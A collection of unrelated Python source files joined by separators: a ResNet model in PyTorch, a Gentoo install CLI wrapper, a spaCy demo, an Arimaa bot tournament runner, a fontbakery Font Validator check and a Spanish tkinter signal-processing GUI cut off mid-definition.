generic_repr, counter, PluginLoader, hybridproperty, hybridmethod, \
safe_reraise,\
get_callable_argspec, only_once, attrsetter, ellipses_string, \
warn_limited, map_bits, MemoizedSlots, EnsureKWArgType, wrap_callable
from .deprecations import warn_deprecated, warn_pending_deprecation, \
deprecated, pending_deprecation, inject_docstring_text
# things that used to be not always available,
# but are now as of current support Python versions
from collections import defaultdict
from functools import partial
from functools import update_wrapper
from contextlib import contextmanager
|
"""resnet in pytorch
[1] Kaiming He, Xiangyu Zhang, Shaoqing Ren, Jian Sun.
Deep Residual Learning for Image Recognition
https://arxiv.org/abs/1512.03385v1
"""
import torch
import torch.nn as nn
class BasicBlock(nn.Module):
"""Basic Block for resnet 18 and resnet 34
"""
#BasicBlock and BottleNeck block
#have different output size
#we use class attribute expansion
#to distinct
expansion = 1
def __init__(self, in_channels, out_channels, stride=1):
super().__init__()
#residual function
self.residual_function = nn.Sequential(
nn.Conv2d(in_channels, out_channels, kernel_size=3, stride=stride, padding=1, bias=False),
nn.BatchNorm2d(out_channels),
nn.ReLU(inplace=True),
nn.Conv2d(out_channels, out_channels * BasicBlock.expansion, kernel_size=3, padding=1, bias=False),
nn.BatchNorm2d(out_channels * BasicBlock.expansion)
)
#shortcut
self.shortcut = nn.Sequential()
#the shortcut output dimension is not the same with residual function
#use 1*1 convolution to match the dimension
if stride != 1 or in_channels != BasicBlock.expansion * out_channels:
self.shortcut = nn.Sequential(
nn.Conv2d(in_channels, out_channels * BasicBlock.expansion, kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(out_channels * BasicBlock.expansion)
)
def forward(self, x):
return nn.ReLU(inplace=True)(self.residual_function(x) + self.shortcut(x))
class BottleNeck(nn.Module):
"""Residual block for resnet over 50 layers
"""
expansion = 4
def __init__(self, in_channels, out_channels, stride=1):
super().__init__()
self.residual_function = nn.Sequential(
nn.Conv2d(in_channels, out_channels, kernel_size=1, bias=False),
nn.BatchNorm2d(out_channels),
nn.ReLU(inplace=True),
nn.Conv2d(out_channels, out_channels, stride=stride, kernel_size=3, padding=1, bias=False),
nn.BatchNorm2d(out_channels),
nn.ReLU(inplace=True),
nn.Conv2d(out_channels, out_channels * BottleNeck.expansion, kernel_size=1, bias=False),
nn.BatchNorm2d(out_channels * BottleNeck.expansion),
)
self.shortcut = nn.Sequential()
if stride != 1 or in_channels != out_channels * BottleNeck.expansion:
self.shortcut = nn.Sequential(
nn.Conv2d(in_channels, out_channels * BottleNeck.expansion, stride=stride, kernel_size=1, bias=False),
nn.BatchNorm2d(out_channels * BottleNeck.expansion)
)
def forward(self, x):
return nn.ReLU(inplace=True)(self.residual_function(x) + self.shortcut(x))
class ResNet(nn.Module):
def __init__(self, block, num_block, num_classes=10):
super().__init__()
self.in_channels = 64
self.conv1 = nn.Sequential(
nn.Conv2d(3, 64, kernel_size=3, padding=1, bias=False),
nn.BatchNorm2d(64),
nn.ReLU(inplace=True))
#we use a different inputsize than the original paper
#so conv2_x's stride is 1
self.conv2_x = self._make_layer(block, 64, num_block[0], 1)
self.conv3_x = self._make_layer(block, 128, num_block[1], 2)
self.conv4_x = self._make_layer(block, 256, num_block[2], 2)
self.conv5_x = self._make_layer(block, 512, num_block[3], 2)
self.avg_pool = nn.AdaptiveAvgPool2d((1, 1))
self.fc = nn.Linear(512 * block.expansion, num_classes)
self.dp1 = nn.Dropout(0.25)
self.dp2 = nn.Dropout(0.25)
self.fc_reg = nn.Linear(num_classes, 1)
def _make_layer(self, block, out_channels, num_blocks, stride):
"""make resnet layers(by layer i didnt mean this 'layer' was the
same as a neuron netowork layer, ex. conv layer), one layer may
contain more than one residual block
Args:
block: block type, basic block or bottle neck block
out_channels: output depth channel number of this layer
num_blocks: how many blocks per layer
stride: the stride of the first block of this layer
Return:
return a resnet layer
"""
# we have num_block blocks per layer, the first block
# could be 1 or 2, other blocks would always be 1
strides = [stride] + [1] * (num_blocks - 1)
layers = []
for stride in strides:
layers.append(block(self.in_channels, out_channels, stride))
self.in_channels = out_channels * block.expansion
return nn.Sequential(*layers)
def forward(self, x):
output = self.conv1(x)
output = self.conv2_x(output)
output = self.conv3_x(output)
output = self.conv4_x(output)
output = self.conv5_x(output)
output = self.avg_pool(output)
output = output.contiguous().view(output.size(0), -1)
output = self.fc(output)
output = self.dp1(output)
output = self.fc_reg(output)
output = output.squeeze(1)
return output
def init_weights(self):
for m in self.modules():
if isinstance(m, nn.Linear):
if m.weight is not None:
torch.nn.init.kaiming_normal_(m.weight.data)
if m.bias is not None:
torch.nn.init.zeros_(m.bias.data)
elif isinstance(m, nn.Conv2d):
if m.weight is not None:
torch.nn.init.kaiming_normal_(m.weight.data)
if m.bias is not None:
torch.nn.init.zeros_(m.bias.data)
elif isinstance(m, nn.BatchNorm2d):
if m.weight is not None:
torch.nn.init.constant_(m.weight.data,1.0)
if m.bias is not None:
torch.nn.init.constant_(m.bias.data,0.0)
def resnet18():
""" return a ResNet 18 object
"""
return ResNet(BasicBlock, [2, 2, 2, 2])
def resnet34():
""" return a ResNet 34 object
"""
return ResNet(BasicBlock, [3, 4, 6, 3])
def resnet50(nb_classes):
""" return a ResNet 50 object
"""
return ResNet(BottleNeck, [3, 4, 6, 3],nb_classes)
def resnet101():
""" return a ResNet 101 object
"""
return ResNet(BottleNeck, [3, 4, 23, 3])
def resnet152():
""" return a ResNet 152 object
"""
return ResNet(BottleNeck, [3, 8, 36, 3])
|
#!/usr/bin/env python3
import os
import pathlib
import sys
import click
import psutil
from .sendgentoo import install
@click.command()
@click.argument("device")
@click.option('--stdlib', is_flag=False, required=True, type=click.Choice(['glibc', 'musl', 'uclibc']))
@click.option("--hostname", type=str, required=True)
@click.option("--ip", type=str, required=True)
@click.option("--skip-to-chroot", is_flag=True)
@click.option("--verbose", is_flag=True)
@click.option("--debug", is_flag=True)
@click.pass_context
def sendgentoosimple(ctx,
device: str,
hostname: str,
ip: str,
stdlib: str,
skip_to_chroot: bool,
verbose: bool,
debug: bool,
):
device = device.strip()
if not os.getenv('TMUX'):
print("Start a Tmux session first. Exiting.", file=sys.stderr)
quit(1)
if not os.geteuid() == 0:
print("you ned to be root. Exiting.", file=sys.stderr)
quit(1)
if not skip_to_chroot:
partitions = psutil.disk_partitions()
for partition in partitions:
if device in partition.device:
print("device:", device, "was found:", partition.device, "mounted at:", partition.mountpoint, file=sys.stderr)
print("Refusing to operate on mounted device. Exiting.", file=sys.stderr)
quit(1)
if not pathlib.Path(device).is_block_device():
print("device:", device, "is not a block device. Exiting.", file=sys.stderr)
quit(1)
password = input("Enter new password: ")
assert len(password) > 0
ctx.invoke(install,
root_devices=(device,),
boot_device=device,
boot_device_partition_table='gpt',
root_device_partition_table='gpt',
boot_filesystem='ext4',
root_filesystem='ext4',
stdlib=stdlib,
raid='disk',
raid_group_size='1',
march='nocona',
hostname=hostname,
newpasswd=password,
ip=ip,
skip_to_chroot=skip_to_chroot,
force=False,
encrypt=False,
multilib=False,
verbose=verbose,
debug=debug,)
|
# Demo of the Spacy NLP library
# Based on https://spacy.io/
# See also
# https://nlpforhackers.io/complete-guide-to-spacy/
import spacy
nlps = spacy.load('en_core_web_sm')
nlpm = spacy.load('en_core_web_md')
tokens = nlpm(u'dog cat banana afskfsd')
for token in tokens:
print(token.text, token.has_vector, token.vector_norm, token.is_oov)
doc = nlps(u'Apple is looking at buying the U.K. startup FooCon for $1 billion.')
for token in doc:
print(token.text, token.lemma_, token.pos_, token.tag_, token.dep_,
token.shape_, token.is_alpha, token.is_stop)
"""
Apple apple PROPN NNP nsubj Xxxxx True False
is be VERB VBZ aux xx True True
looking look VERB VBG ROOT xxxx True False
at at ADP IN prep xx True True
buying buy VERB VBG pcomp xxxx True False
the the DET DT det xxx True True
U.K. u.k. PROPN NNP compound X.X. False False
startup startup NOUN NN dobj xxxx True False
FooCon foocon NOUN NN appos XxxXxx True False
for for ADP IN prep xxx True True
$ $ SYM $ quantmod $ False False
1 1 NUM CD compound d False False
billion billion NUM CD pobj xxxx True False
. . PUNCT . punct . False False
"""
# With the medium model, 'is' and 'at' are not flagged as stop words.
# This is a know bug.
# https://github.com/explosion/spaCy/issues/922
# Here is a fix.
nlpm.vocab.add_flag(lambda s: s.lower() in spacy.lang.en.stop_words.STOP_WORDS, spacy.attrs.IS_STOP)
doc = nlpm(u'Apple is looking at buying the U.K. startup FooCon for $1 billion.')
for token in doc:
print(token.text, token.lemma_, token.pos_, token.tag_, token.dep_,
token.shape_, token.is_alpha, token.is_stop)
corpus=[
'Mary had a little lamb, little lamb, little lamb',
'Mary had a little lamb',
'Whose fleece was white as snow.',
'And everywhere that Mary went',
'Mary went, Mary went,',
'Everywhere that Mary went',
'The lamb was sure to go.'
]
corpus_tokenized = [nlpm(doc) for doc in corpus]
all_tokens = [token for doc in corpus_tokenized for token in doc]
#vocab = set(all_tokens)
vocab = set()
for t in all_tokens:
vocab.add(str(t))
|
#!/usr/bin/env python
# Copyright (c) 2009-2015 Brian Haskin Jr.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from __future__ import print_function
import logging
import re
import socket
import sys
import time
from argparse import ArgumentParser
try:
from ConfigParser import SafeConfigParser, NoOptionError
ConfigParser = SafeConfigParser
except ModuleNotFoundError:
from configparser import ConfigParser, NoOptionError
xrange = range
from pyrimaa import aei
from pyrimaa.game import Game
from pyrimaa.util import TimeControl
log = logging.getLogger("roundrobin")
def run_bot(bot, config, global_options):
cmdline = config.get(bot['name'], "cmdline")
if config.has_option(bot['name'], "communication_method"):
com_method = config.get(bot['name'], "communication_method").lower()
else:
com_method = "stdio"
eng_com = aei.get_engine(com_method, cmdline, "roundrobin.aei")
engine = aei.EngineController(eng_com)
for option, value in global_options:
engine.setoption(option, value)
for name, value in config.items(bot['name']):
if name.startswith("bot_"):
engine.setoption(name[4:], value)
return engine
def format_time(seconds):
hours = int(seconds / 3600)
seconds -= hours * 3600
minutes = int(seconds / 60)
seconds -= minutes * 60
fmt_tm = []
if hours:
fmt_tm.append("%dh" % hours)
if minutes or fmt_tm:
fmt_tm.append("%dm" % minutes)
fmt_tm.append("%ds" % seconds)
return "".join(fmt_tm)
def get_config(args=None):
class NotSet:
pass
notset = NotSet()
parser = ArgumentParser(
description="Play engines in a round robin tournament.")
parser.add_argument("--config",
default="roundrobin.cfg",
help="Configuration file to use")
parser.add_argument("--log", help="Set log output level")
parser.add_argument("--pgn", help="PGN results filename")
parser.add_argument("-r", "--rounds",
type=int,
help="Number of rounds to run")
parser.add_argument(
"--stop-time",
type=int,
help="Number of seconds to leave when sending a bot a stop command")
parser.add_argument(
"--strict-setup",
action="store_true",
default=notset,
help="Require the setup moves to be complete and legal")
parser.add_argument(
"--allow-setup",
dest="strict_setup",
action="store_false",
help="Allow incomplete or otherwise illegal setup moves")
parser.add_argument("--timecontrol", "--tc", help="Timecontrol to use")
parser.add_argument("bots", nargs="*", help="Bots to use in tournament")
args = parser.parse_args(args)
config = ConfigParser()
if config.read(args.config) != [args.config]:
print("Could not open '%s'" % (args.config, ))
return 1
args.ini = config
args.bot_sections = set(config.sections())
if "global" not in args.bot_sections:
print("Did not find expected 'global' section in configuration file.")
return 1
args.bot_sections.remove('global')
try:
loglevel = config.get("global", "loglevel")
except NoOptionError:
loglevel = None
loglevel = loglevel if args.log is None else args.log
if loglevel is not None:
loglevel = logging.getLevelName(loglevel)
if not isinstance(loglevel, int):
print("Bad log level %s, use ERROR, WARNING, INFO or DEBUG." % (
loglevel,
))
logging.basicConfig(level=loglevel)
if args.pgn is None:
try:
args.pgn = config.get("global", "pgn_filename")
except:
pass
if args.rounds is None:
try:
args.rounds = config.getint("global", "rounds")
except NoOptionError:
pass
if args.timecontrol is None:
try:
args.timecontrol = config.get("global", "timecontrol")
except NoOptionError:
pass
if args.strict_setup is notset:
try:
args.strict_setup = config.getboolean("global", "strict_setup")
except NoOptionError:
args.strict_setup = None
if args.stop_time is None:
try:
args.stop_time = config.getint("global", "stop_time")
except NoOptionError:
pass
if len(args.bots) == 0:
try:
args.bots = config.get("global", "bots").split()
except NoOptionError:
args.bots = args.bot_sections
args.global_options = list()
for option, value in config.items("global"):
if option.startswith("bot_"):
args.global_options.append((option[4:], value))
return args
def main(args=None):
cfg = get_config(args)
if cfg.rounds:
print("Number of rounds: %d" % (cfg.rounds, ))
else:
print("Number of rounds not specified, running 1 round.")
cfg.rounds = 1
try:
tctl_str = cfg.timecontrol
if tctl_str.lower() == "none":
timecontrol = None
else:
timecontrol = TimeControl(tctl_str)
print("At timecontrol %s" % (tctl_str, ))
except NoOptionError:
timecontrol = None
if cfg.global_options:
print("Giving these settings to all bots:")
for name, value in cfg.global_options:
print(" %s: %s" % (name, value))
print("Playing bots: ", end='')
for bot in cfg.bots:
print(bot, end=' ')
print()
# setup to write a bayeselo compatible pgn file
write_pgn = False
if cfg.pgn is not None:
try:
pgn_file = open(cfg.pgn, "a+")
except IOError:
print("Could not open pgn file %s" % (cfg.pgn, ))
return 1
print("Writing results to pgn file: %s" % (cfg.pgn, ))
write_pgn = True
bots = []
for bname in cfg.bots:
for bsection in cfg.bot_sections:
if bname.lower() == bsection.lower():
bot_options = []
for name, value in cfg.ini.items(bsection):
if name.startswith("bot_"):
bot_options.append((name[4:], value))
bot = {
'name': bsection,
'options': bot_options,
'gold': 0,
'wins': 0,
'timeouts': 0,
'reasons': dict()
}
if cfg.ini.has_option(bsection, "timecontrol"):
tctl_str = cfg.ini.get(bsection, "timecontrol")
if tctl_str.lower() == "none":
tc = None
else:
tc = TimeControl(tctl_str)
print("bot %s at timecontrol %s" % (bsection, tctl_str))
bot['timecontrol'] = tc
bots.append(bot)
break
else:
print("Did not find a bot section for %s" % (bname))
return 1
start_time = time.time()
for round_num in xrange(cfg.rounds):
for bot_ix, bot in enumerate(bots[:-1]):
for opp in bots[bot_ix + 1:]:
if bot['gold'] <= opp['gold']:
gbot = bot
sbot = opp
else:
gbot = opp
sbot = bot
gbot['gold'] += 1
gengine = run_bot(gbot, cfg.ini, cfg.global_options)
sengine = run_bot(sbot, cfg.ini, cfg.global_options)
tc = [timecontrol, timecontrol]
if 'timecontrol' in gbot:
tc[0] = gbot['timecontrol']
if 'timecontrol' in sbot:
tc[1] = sbot['timecontrol']
game = Game(gengine, sengine, tc,
strict_setup=cfg.strict_setup,
min_timeleft=cfg.stop_time)
wside, reason = game.play()
gengine.quit()
sengine.quit()
winner = [gbot, sbot][wside]
loser = [gbot, sbot][wside ^ 1]
# Display result of game
print("%d%s" % (game.movenumber, "gs" [game.position.color]))
print(game.position.board_to_str())
print("%s beat %s because of %s playing side %s" % (
winner['name'], loser['name'], reason, "gs" [wside]
))
# Record game result stats
winner['wins'] += 1
if reason == 't':
[gbot, sbot][wside ^ 1]['timeouts'] += 1
winner['reasons'][reason] = winner['reasons'].get(reason, 0) + 1
# write game result to pgn file
if write_pgn:
ply_count = game.movenumber * 2
if game.position.color:
ply_count -= 1
else:
ply_count -= 2
results = ['1-0', '0-1']
pgn_file.write('[White "%s"]\n' % (gbot['name'], ))
pgn_file.write('[Black "%s"]\n' % (sbot['name'], ))
if timecontrol:
pgn_file.write('[TimeControl "%s"]\n' % (tctl_str, ))
pgn_file.write('[PlyCount "%s"]\n' % (ply_count, ))
pgn_file.write('[ResultCode "%s"]\n' % (reason, ))
pgn_file.write('[Result "%s"]\n' % (results[wside], ))
pgn_file.write('\n')
for move in game.moves:
pgn_file.write('%s\n' % (move, ))
pgn_file.write('%s\n\n' % (results[wside]))
pgn_file.flush()
# give the engines up to 30 more seconds to exit normally
for i in range(30):
if (not gengine.is_running() and not sengine.is_running()):
break
time.sleep(1)
gengine.cleanup()
sengine.cleanup()
round_end = time.time()
total_time = round_end - start_time
print("After round %d and %s:" % (round_num + 1,
format_time(total_time)))
for bot in bots:
print("%s has %d wins and %d timeouts" % (bot['name'], bot['wins'],
bot['timeouts']))
for name, value in bot['reasons'].items():
print(" %d by %s" % (value, name))
return 0
if __name__ == "__main__":
sys.exit(main())
|
import os
from fontbakery.callable import check
from fontbakery.status import ERROR, FAIL, INFO, PASS, WARN
from fontbakery.section import Section
from fontbakery.message import Message
# used to inform get_module_profile whether and how to create a profile
from fontbakery.fonts_profile import profile_factory # NOQA pylint: disable=unused-import
from .shared_conditions import is_variable_font
profile_imports = ['.shared_conditions']
profile = profile_factory(default_section=Section("Checks inherited from Microsoft Font Validator"))
@check(
id = 'com.google.fonts/check/fontvalidator',
proposal = 'legacy:check/037'
)
def com_google_fonts_check_fontvalidator(font):
"""Checking with Microsoft Font Validator."""
# In some cases we want to override the severity level of
# certain checks in FontValidator:
downgrade_to_warn = [
# There are reports that this fontval check has an out-of-date
# understanding of valid bits in fsSelection.
# More info at:
# https://github.com/googlei18n/fontmake/issues/414#issuecomment-379408127
"There are undefined bits set in fsSelection field",
# FIX-ME: Why did we downgrade this one to WARN?
"Misoriented contour"
]
# Some other checks we want to completely disable:
disabled_fval_checks = [
# FontVal E4012 thinks that
# "Versions 0x00010000 and 0x0001002 are currently
# the only defined versions of the GDEF table."
# but the GDEF chapter of the OpenType specification at
# https://docs.microsoft.com/en-us/typography/opentype/spec/gdef
# describes GDEF header version 1.3, which is not yet recognized
# by FontVal, thus resulting in this spurious false-FAIL:
"The version number is neither 0x00010000 nor 0x0001002",
# These messages below are simply fontval given user feedback
# on the progress of runnint it. It has nothing to do with
# actual issues on the font files:
"Validating glyph with index",
"Table Test:",
# No software is affected by Mac strings nowadays.
# More info at: googlei18n/fontmake#414
"The table doesn't contain strings for Mac platform",
"The PostScript string is not present for both required platforms",
# Font Bakery has got a native check for the xAvgCharWidth field
# which is: com.google.fonts/check/xavgcharwidth
"The xAvgCharWidth field does not equal the calculated value",
# The optimal ordering suggested by FVal check W0020 seems to only be
# relevant to performance optimizations on old versions of Windows
# running on old hardware. Since such performance considerations
# are most likely negligible, we're not going to bother users with
# this check's table ordering requirements.
# More info at:
# https://github.com/googlefonts/fontbakery/issues/2105
"Tables are not in optimal order",
# Font Bakery has its own check for required/optional tables:
# com.google.fonts/check/required_tables
"Recommended table is missing"
]
# There are also some checks that do not make
# sense when we're dealing with variable fonts:
VARFONT_disabled_fval_checks = [
# Variable fonts typically do have lots of self-intersecting
# contours because they are used to draw each portion
# of variable glyph features.
"Intersecting contours",
"Intersecting components of composite glyph",
# DeltaFormat = 32768 (same as 0x8000) means VARIATION_INDEX,
# according to https://docs.microsoft.com/en-us/typography/opentype/spec/chapter2
# The FontVal problem description for this check (E5200) only mentions
# the other values as possible valid ones. So apparently this means FontVal
# implementation is not up-to-date with more recent versions of the OpenType spec
# and that's why these spurious FAILs are being emitted.
# That's good enough reason to mute it.
# More info at:
# https://github.com/googlefonts/fontbakery/issues/2109
"The device table's DeltaFormat value is invalid"
]
from fontTools.ttLib import TTFont
if is_variable_font(TTFont(font)):
disabled_fval_checks.extend(VARFONT_disabled_fval_checks)
try:
import subprocess
fval_cmd = [
"FontValidator", "-file", font, "-all-tables",
"-report-in-font-dir", "-no-raster-tests"
]
subprocess.check_output(fval_cmd, stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as e:
filtered_msgs = ""
for line in e.output.decode().split("\n"):
disable_it = False
for substring in disabled_fval_checks:
if substring in line:
disable_it = True
if not disable_it:
filtered_msgs += line + "\n"
yield INFO, \
Message("fontval-returned-error",
("Microsoft Font Validator returned an error code."
" Output follows :\n\n{}\n").format(filtered_msgs))
except (OSError, IOError) as error:
yield ERROR, \
Message("fontval-not-available",
"Mono runtime and/or Microsoft Font Validator"
" are not available!")
raise error
def report_message(msg, details):
if details:
if isinstance(details, list) and len(details) > 1:
# We'll print lists with one item per line for
# improved readability.
if None in details:
details.remove(None)
# A designer will likely not need the full list
# in order to fix a problem.
# Showing only the 10 first ones is more than enough
# and helps avoid flooding the report.
if len(details) > 25:
num_similar = len(details) - 10
details = details[:10]
details.append(f"NOTE: {num_similar} other similar"
" results were hidden!")
details = '\n\t- ' + '\n\t- '.join(details)
return f"MS-FonVal: {msg} DETAILS: {details}"
else:
return f"MS-FonVal: {msg}"
xml_report_file = f"{font}.report.xml"
html_report_file = f"{font}.report.html"
fval_file = os.path.join(os.path.dirname(font), 'fval.xsl')
grouped_msgs = {}
with open(xml_report_file, "rb") as xml_report:
from lxml import etree
doc = etree.fromstring(xml_report.read())
for report in doc.iterfind('.//Report'):
msg = report.get("Message")
details = report.get("Details")
disable_it = False
for substring in disabled_fval_checks:
if substring in msg:
disable_it = True
if disable_it:
continue
if msg not in grouped_msgs:
grouped_msgs[msg] = {"errortype": report.get("ErrorType"),
"details": [details]}
else:
if details not in grouped_msgs[msg]["details"]:
# avoid cluttering the output with tons of identical reports
# yield INFO, 'grouped_msgs[msg]["details"]: {}'.format(grouped_msgs[msg]["details"])
grouped_msgs[msg]["details"].append(details)
# ---------------------------
# Clean-up generated files...
os.remove(xml_report_file)
# FontVal internal detail: HTML report generated only on non-Windows due to
# Mono or the used HTML renderer not being able to render XML with a
# stylesheet directly. https://github.com/googlefonts/fontbakery/issues/1747
if os.path.exists(html_report_file):
os.remove(html_report_file)
os.remove(fval_file)
# ---------------------------
# Here we start emitting the grouped log messages
for msg, data in grouped_msgs.items():
# But before printing we try to make the "details" more
# readable. Otherwise the user would get the text terminal
# flooded with messy data.
# No need to print is as a list if wereally only
# got one log message of this kind:
if len(data["details"]) == 1:
data["details"] = data["details"][0]
# Simplify the list of glyph indices by only displaying
# their numerical values in a list:
for glyph_index in ["Glyph index ", "glyph# "]:
if data["details"] and \
data["details"][0] and \
glyph_index in data["details"][0]:
try:
data["details"] = {'Glyph index': [int(x.split(glyph_index)[1])
for x in data["details"]]}
break
except ValueError:
pass
# And, finally, the log messages are emitted:
if data["errortype"] == "P":
yield PASS, report_message(msg, data["details"])
elif data["errortype"] == "E":
status = FAIL
for substring in downgrade_to_warn:
if substring in msg:
status = WARN
yield status, Message("fontval-error", report_message(msg, data["details"]))
elif data["errortype"] == "W":
yield WARN, Message("fontval-warn", report_message(msg, data["details"]))
else:
yield INFO, Message("fontval-info", report_message(msg, data["details"]))
profile.auto_register(globals())
|
from tkinter import *
import matplotlib.pyplot as plt
from matplotlib import pyplot
import numpy as np
# Archivos de uso común
from senalDiscreta import *
from manejadorDeSenales import *
# Archivos que contienen las operaciones ----------------------------- AGREGAR AQUI SUS ARCHIVOS CORRESPONDIENTES A SUS OPERACIONES
from operacionSuma import *
from operacionResta import *
from operacionReflejo import *
from operacionConvolucion import *
from operacionAmplificacionAtenuacion import *
from operacionInterpolacionDiezmacion import *
from operacionDesplazamiento import *
ventana = Tk()
#Entradas de los cuadros de texto al meter una
#secuencia de datos
#L= Left (Izquierda), O= Origen , R = Right(Derecha)
xL = StringVar()
xO = StringVar()
xR = StringVar()
# Opciones
multiplicador = StringVar()
factorInterpolacionDiezmacion = StringVar()
udsDesplazamiento = IntVar()
hL = StringVar()
hO = StringVar()
hR = StringVar()
# Variables para las periocidades
xesperiodica = BooleanVar()
hesperiodica = BooleanVar()
# Varibles para operaciones particulares
opcionreflejo = IntVar() # Opción para decidir en que eje se reflejara
# Variables para mensajes
estadoGrabacion = StringVar()
# Con el siguiente algoritmo lo que se hace
# es hacer tanto x(n) como h(n) tengan la
# misma cantidad de elementos en el arreglo
# en caso de que una tenga mas, se acompleta
# con 0's ya sea a la izquierda o derecha
# segun sea el caso
newH = [] # Lista para h(n) de longitud estandar
newX = [] # Lista para x(n) de longitud estandar
newX2 = []
puntosEjeH = [] # Lista que contiene los puntos en donde se graficaran las listas en el eje horizontal
def crearVentana():
''' Crea la GUI junto con el establecimiento de sus propiedades '''
global ventana
#Dimenciones de la pantalla
ventana.geometry("700x650+350+60")
ventana.title("Proyecto de Señales")
#Ajuste de la pantalla
ventana.resizable(width=True, height=False)
def verInicio():
'''
Función para la GUI\n
Muestra los primeros controles correspondientes a la desición del método de entrada de valores
'''
global puntosEjeH,newX,newH
newH = []
newX = []
puntosEjeH = []
#Uso una imagen como fondo, debido a que es la
#unica forma que encuentro para tapar la
#ventana anterior, por lo que al crear un
#nuevo escenario, siempre se tiene que poner esto
imagenFondo = PhotoImage(file="imgs/fondo.pgm")
Label(ventana, image=imagenFondo).place(x=0, y=0)
#Etiqueta para escribir en la pantalla
Label(ventana, text="Entrada:",
font=("Arial", 30)).place(x=275, y=5)
Button(ventana, text="Secuencia de valores", cursor="hand2",
bd=10, background="#b5ead7", height=0, command=introducirValores,
font=("Arial", 19)).place(x=55, y=70)
#en donde dice command te debe de dirigir a una pantalla
#en la cual se puede grabar un audio
Button(ventana, text=" Señal de audio ", cursor="hand2",
bd=10, background="#b5ead7", height=0, command=introducirValoresAudio,
font=("Arial", 19)).place(x=360, y=70)
ventana.mainloop()
def introducirValores():
'''
Función para la GUI\n
Cambia la ventana al modo de introducir valores con las 3 entradas para x(n) y las otras 3 para h(n)
'''
xPosicion = 100
yPosicion = 100
espacio = 65
imagenFondo = PhotoImage(file="imgs/fondo.pgm")
Label(ventana, image=imagenFondo).place(x=0, y=0)
Button(ventana, text="↶", cursor="hand2",
bd=10, background="#ff9aa2", height=0, command=verInicio,
font=("Arial", 15)).place(x=2, y=5)
Label(ventana, text="x(n){",
font=("Arial", 25)).place(x=50, y=15)
Entry(ventana,justify=RIGHT, textvariable=xL, width=10,
font=("Arial", 25)).place(x=130, y=20)
Entry(ventana, textvariable=xO, width=2,
font=("Arial", 25)).place(x=330, y=20)
Entry(ventana, textvariable=xR, width=10,
font=("Arial", 25)).place(x=385, y=20)
Label(ventana, text="}",
font=("Arial", 25)).place(x=580, y=15)
Label(ventana, text="h(n){",
font=("Arial", 25)).place(x=50, y=75)
Entry(ventana, justify=RIGHT, textvariable=hL, width=10,
font=("Arial", 25)).place(x=130, y=80)
Entry(ventana, textvariable=hO, width=2,
font=("Arial", 25)).place(x=330, y=80)
Entry(ventana, textvariable=hR, width=10,
font=("Arial", 25)).place(x=385, y=80)
Label(ventana, text="}",
font=("Arial", 25)).place(x=580, y=75)
Label(ventana, text="ORIGEN",
font=("Arial", 10)).place(x=322, y=62)
Button(ventana, text="Sumar", cursor="hand2",
bd=8, background="#ffb3cc", height=1, command=sumar,
font=("Arial", 16)).place(x=xPosicion, y=espacio + yPosicion)
Button(ventana, text="Restar", cursor="hand2",
bd=8, background="#ffb3cc", height=1, command=restar,
font=("Arial", 16)).place(x=xPosicion + 97, y=espacio + yPosicion)
Button(ventana, text="Amplificación / Atenuación", cursor="hand2",
bd=8, background="#ffb3cc", height=1, command=amplificarAtenuar,
font=("Arial", 16)).place(x=xPosicion, y=espacio * 2 + yPosicion)
Entry(ventana,justify=CENTER, textvariable=multiplicador, width=4,
font=("Arial", 16)).place(x=385, y=248)
Label(ventana, text="Multiplicador",
font=("Arial", 10)).place(x=380, y=225)
Button(ventana, text="Reflejo en X y Y", cursor="hand2",
bd=8, background="#ffb3cc", height=1, command=reflejarEnXyY,
font=("Arial", 16)).place(x=xPosicion, y=espacio*3+yPosicion)
Button(ventana, text="Desplazamiento", cursor="hand2",
bd=8, background="#ffb3cc", height=1, command=desplazar,
font=("Arial", 16)).place(x=xPosicion, y=espacio*4+yPosicion)
Entry(ventana,justify=CENTER, textvariable=udsDesplazamiento, width=4,
font=("Arial", 16)).place(x=285, y=323+53)
Label(ventana, text="Unidades a desplazar",
font=("Arial", 10)).place(x=285+5, y=300+53)
Entry(ventana,justify=CENTER, textvariable=factorInterpolacionDiezmacion, width=4,
font=("Arial", 16)).place(x=405, y=448)
Label(ventana, text="Factor de diezmación/interpolación",
font=("Arial", 10)).place(x=400, y=425)
Button(ventana, text="Diezmación", cursor="hand2",
bd=8, background="#ffb3cc", height=1, command=diezmar,
font=("Arial", 16)).place(x=xPosicion, y=espacio*5+yPosicion)
Button(ventana, text="Interpolación", cursor="hand2",
bd=8, background="#ffb3cc", height=1, command=interpolar,
font=("Arial", 16)).place(x=xPosicion+145, y=espacio*5+yPosicion)
Button(ventana, text="Convolución", cursor="hand2",
bd=8, background="#ffb3cc", height=1, command=convolusionar,
font=("Arial", 16)).place(x=xPosicion, y=espacio*6+yPosicion)
Button(ventana, text="FFT", cursor="hand2",
bd=8, background="#ffb3cc", height=1, command=fft,
font=("Arial", 16)).place(x=xPosicion, y=espacio*7+yPosicion)
Button(ventana, text="Pruebas", command=tests).place(x=xPosicion+15, y=espacio*8+yPosicion)
#Checkboxes
Checkbutton(ventana, text="Periodica", variable=xesperiodica).place(x=615, y=25)
Checkbutton(ventana, text="Periodica", variable=hesperiodica).place(x=615, y=85)
ventana.mainloop()
def introducirValoresAudio():
"""
Función para la GUI\n
Configura la pantalla para que se pueda trabajar con audio
"""
xPosicion = 100
yPosicion = 100
espacio = 65
imagenFondo = PhotoImage(file="imgs/fondo.pgm")
Label(ventana, image=imagenFondo).place(x=0, y=0)
Button(ventana, text="↶", cursor="hand2",
